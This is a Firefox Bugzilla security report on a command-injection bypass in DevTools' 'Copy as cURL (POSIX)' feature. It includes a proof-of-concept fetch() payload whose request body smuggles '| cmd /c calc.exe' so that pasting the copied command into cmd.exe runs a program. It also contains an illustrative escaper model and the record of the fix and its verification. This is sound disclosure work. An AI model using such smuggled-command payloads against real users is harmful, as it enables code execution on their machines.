Copy As Curl (Posix) - Code Execution - bug 1949994 bypass
Categories
(DevTools :: Netmonitor, defect)
Tracking
(firefox-esr115 138+ verified, firefox-esr128 138+ verified, firefox137 wontfix, firefox138 + verified, firefox139 + verified)
People
(Reporter: ameenbasha111, Assigned: bomsy)
References
Details
(Keywords: csectype-priv-escalation, reporter-external, sec-moderate, Whiteboard: [client-bounty-form][adv-main138+][adv-esr115.23+][adv-esr128.10+])
Attachments (3 files)
- 3.37 MB, video/mp4
- 48 bytes, text/x-phabricator-request (diannaS: approval-mozilla-beta+, approval-mozilla-esr115+, approval-mozilla-esr128+)
- 300 bytes, text/plain
Hi Team, while retesting another fixed issue of mine (ref added below), I found a way to bypass the fix and get my code executed on the victim's machine.
Ref: https://bugzilla.mozilla.org/show_bug.cgi?id=1949994
Root cause: & and | both allow cmd to execute multiple commands; it seems only & is handled in the above ticket. Using | I can still execute code.
Payload:
// Sends a POST whose body carries a cmd.exe pipe. "Copy as cURL (POSIX)" of
// this request yields a command that, when pasted into cmd.exe, runs calc.exe.
fetch("/", {
  credentials: "omit",
  headers: {
    "Accept-Language": "en-US",
    "Content-Type": "text/plain",
  },
  body: "query=evil\n\n | cmd /c calc.exe \n\n",
  method: "POST",
});
Steps to reproduce
- Paste the above code in the console (or include it in an HTML file to auto-send the request)
- Use the "Copy as cURL (POSIX)" feature on the request
- Paste it into cmd and you can see calc pop up
Tested on the latest Firefox Nightly (on which #1949994 is fixed).
I have attached the PoC video for reference.
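Why pasting a POSIX-quoted command into cmd.exe runs code: cmd.exe does not treat `'...'` or bash's ANSI-C `$'...'` as quoting, so any `&` or `|` inside the copied body is read as a command separator. The block below is an added illustration, not Firefox's own devtools code: it models the POSIX string escaper behind "Copy as cURL (POSIX)" before and after hex-escaping the operator, and it generalizes past the two characters this bug covers (the `CMD_SPECIAL` set, the `buildCurlCommand` shape, the URL and the checker functions are all assumptions made here). It reports which operators cmd.exe would still act on, and confirms that the hardened form still decodes to the original body in bash.

```javascript
// Added example; not Firefox's devtools/client/shared/curl.js. Models the
// POSIX string escaper behind "Copy as cURL (POSIX)" before and after the
// fix, plus two reviewer checks: which operators cmd.exe still sees when
// the command is pasted into it, and whether the hardened output still
// decodes to the original body in bash.

// Body from comment 0, reconstructed here; the newlines force ANSI-C $'...'
// quoting, and the | is what cmd.exe turns into a pipe.
const PAYLOAD_BODY = "query=evil\n\n | cmd /c calc.exe \n\n";

// One character as a bash ANSI-C \xHH (or \uHHHH) escape.
function escapeCharacter(ch) {
  const code = ch.charCodeAt(0);
  return code < 256
    ? "\\x" + code.toString(16).padStart(2, "0")
    : "\\u" + code.toString(16).padStart(4, "0");
}

// Shared ANSI-C body: backslash, quote, CR/LF and non-printables escaped.
function ansiCBody(str) {
  return str
    .replace(/\\/g, "\\\\")
    .replace(/'/g, "\\'")
    .replace(/\n/g, "\\n")
    .replace(/\r/g, "\\r")
    .replace(/[^\x20-\x7E]/g, escapeCharacter);
}

// Before: correct for bash, but & and | are copied through raw. cmd.exe does
// not treat ' or $' as quoting, so pasted there they separate commands.
function escapeStringPosixBefore(str) {
  if (/[^\x20-\x7E]|'/.test(str)) return "$'" + ansiCBody(str) + "'";
  return "'" + str + "'";
}

// Characters cmd.exe gives meaning outside double quotes. The bug covers
// & and |; this set (an assumption, wider than the page) also includes
// < > ^ % and the double quote itself.
const CMD_SPECIAL = /[&|<>^%"]/;

// After: use ANSI-C quoting whenever such a character is present and emit it
// as \xHH. bash decodes that back to the same byte; cmd.exe never sees the
// raw operator. A backslash prefix would not do: cmd.exe's escape is ^.
function escapeStringPosixAfter(str) {
  if (/[^\x20-\x7E]|'/.test(str) || CMD_SPECIAL.test(str)) {
    const hexed = ansiCBody(str).replace(new RegExp(CMD_SPECIAL.source, "g"), escapeCharacter);
    return "$'" + hexed + "'";
  }
  return "'" + str + "'";
}

// Minimal command builder (assumed shape, not the real Netmonitor one).
function buildCurlCommand({ url, method, headers, body }, escape) {
  const parts = ["curl", escape(url), "-X", method];
  for (const [name, value] of Object.entries(headers)) {
    parts.push("-H", escape(`${name}: ${value}`));
  }
  if (body !== undefined) parts.push("--data-raw", escape(body));
  return parts.join(" ");
}

// cmd.exe's view of a pasted line: only double quotes group text and only ^
// escapes; ' and $' are ordinary characters. Returns the separators and
// redirections cmd.exe would act on.
function cmdExeOperators(line) {
  const found = [];
  let inDoubleQuotes = false;
  for (let i = 0; i < line.length; i++) {
    const c = line[i];
    if (c === '"') { inDoubleQuotes = !inDoubleQuotes; continue; }
    if (inDoubleQuotes) continue;
    if (c === "^") { i++; continue; }
    if ("&|<>".includes(c)) found.push(c);
  }
  return found;
}

// bash's view: decode a '...' or $'...' word back to the bytes curl would send.
function decodePosixWord(word) {
  if (word.startsWith("$'") && word.endsWith("'")) {
    const s = word.slice(2, -1);
    let out = "";
    for (let i = 0; i < s.length; i++) {
      if (s[i] !== "\\") { out += s[i]; continue; }
      const n = s[++i];
      if (n === "n") out += "\n";
      else if (n === "r") out += "\r";
      else if (n === "x") { out += String.fromCharCode(parseInt(s.substr(i + 1, 2), 16)); i += 2; }
      else if (n === "u") { out += String.fromCharCode(parseInt(s.substr(i + 1, 4), 16)); i += 4; }
      else out += n; // \\ and \'
    }
    return out;
  }
  if (word.startsWith("'") && word.endsWith("'")) return word.slice(1, -1);
  throw new Error("not a quoted word: " + word);
}

// Build the command both ways for a request carrying `body` and report what
// each shell would make of it.
function demonstrate(body = PAYLOAD_BODY) {
  const request = {
    url: "http://localhost/", method: "POST",
    headers: { "Content-Type": "text/plain" }, body,
  };
  const before = buildCurlCommand(request, escapeStringPosixBefore);
  const after = buildCurlCommand(request, escapeStringPosixAfter);
  return {
    before, after,
    cmdSeesBefore: cmdExeOperators(before),
    cmdSeesAfter: cmdExeOperators(after),
    bashRoundTrips: decodePosixWord(escapeStringPosixAfter(body)) === body,
  };
}

console.log(demonstrate());
```

Run it with `node`; `cmdSeesBefore` lists the `|` from the body, `cmdSeesAfter` is empty, and `bashRoundTrips` is true. Two caveats: `$'...'` is bash/zsh ANSI-C quoting rather than strict POSIX sh, so the hex escapes only decode in shells that support it; and `cmdExeOperators` is a deliberately simple model of cmd.exe parsing (double quotes and `^` only), enough to show the exposure, not a full emulation.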
Comment 3 • 1 year ago
It would be best to fix this in 138 and release with the fix for bug 1949994.
Comment 6 • 1 year ago
The patch landed in nightly and beta is affected.
:bomsy, is this bug important enough to require an uplift?
- If yes, please nominate the patch for beta approval.
- See https://wiki.mozilla.org/Release_Management/Requesting_an_Uplift for documentation on how to request an uplift.
- If no, please set status-firefox138 to wontfix.
For more information, please visit BugBot documentation.
Comment 7 • 1 year ago • Assignee
Comment on attachment 9479102 [details]
Bug 1960198 - [devtools] Escape the vertical bar character r=#devtools
Beta/Release Uplift Approval Request
- User impact if declined/Reason for urgency: Malicious code can be executed on the user's machine
- Is this code covered by automated tests?: Yes
- Has the fix been verified in Nightly?: Yes
- Needs manual test from QE?: Yes
- If yes, steps to reproduce:
- List of other uplifts needed: None
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Small js code to escape the curl command
- String changes made/needed:
- Is Android affected?: No
Comment 8 • 1 year ago • Assignee
Comment on attachment 9479102 [details]
Bug 1960198 - [devtools] Escape the vertical bar character r=#devtools
ESR Uplift Approval Request
- If this is not a sec:{high,crit} bug, please state case for ESR consideration: This is a Security Bug
- User impact if declined:
- Fix Landed on Version:
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Small js fix to escape the curl command
Comment 10 • 1 year ago
Comment on attachment 9479102 [details]
Bug 1960198 - [devtools] Escape the vertical bar character r=#devtools
Approved for 138.0b9
Approved for 115.23esr
Approved for 128.10esr
I have reproduced the issue by following the steps from comment 0 on Windows 10 x64 with Firefox 138.0b7 and on Windows 7 x64 with Firefox 115.22esr. After executing the copied cURL (POSIX) command inside CMD, the Calculator application was opened.
The issue is verified fixed on Windows 10 with Firefox 139.0a1 (2025-04-22), 138.0 and 128.10.0esr, and on Windows 7 x64 with 115.23esr. The Calculator application is no longer opened after following the steps from comment 0 and executing the copied cURL (POSIX) command inside CMD.